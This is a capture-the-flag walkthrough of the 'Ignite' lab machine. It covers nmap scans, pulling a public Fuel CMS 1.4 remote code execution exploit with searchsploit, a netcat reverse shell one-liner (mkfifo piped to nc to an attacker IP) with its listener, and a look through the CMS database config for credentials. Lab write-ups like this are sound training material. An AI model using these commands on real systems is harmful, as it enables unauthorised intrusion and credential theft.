Ignite

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.108.60

Detailed Nmap Scan :

Command Breakdown:

(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 80
(-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 80 -oN nmap 10.10.101.147

Enumeration

Lets visit the website

Its a guide on how to use Fuel CMS. In the nmap scan we saw a hidden directory called /fuel, lets visit that. It redirects us to this page.

Its a login page. At the moment we do not have credentials, so we cannot login. Lets go to searchsploit and search for exploits on this version of fuel CMS.

searchsploit fuel cms 1.4

We can see that there are two Remote code execution vulnerabilities, lets use one of them to exploit this machine. Lets copy this exploit to our directory.

searchsploit -m linux/webapps/47138.py

Looking through the exploit , we need to change the URL to the URL of the machine we are attacking.

After changing it, I ran the exploit.

python 47138.py

We have remote code execution, now we can run commands from the victim machine. Lets run a reverse shell command to get a shell on the machine. We can find a reverse shell here.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Make sure to change the IP and start a netcat listener.

nc -lvnp 1234

Before running the command, lets remove all the unnecessary code in the exploit so that we do not get any errors if something that is not of our concern does not work.

Now lets run the command and run the reverse shell command, we get a shell.

Now we can read the flag.txt file.

Privilege Escalation

After looking around for a while, I went into the /var/www/html/fuel/application/config directory as config files are always interesting. One file that looked very interesting to me was the database.php file as I thought that I can find usernames and password in it.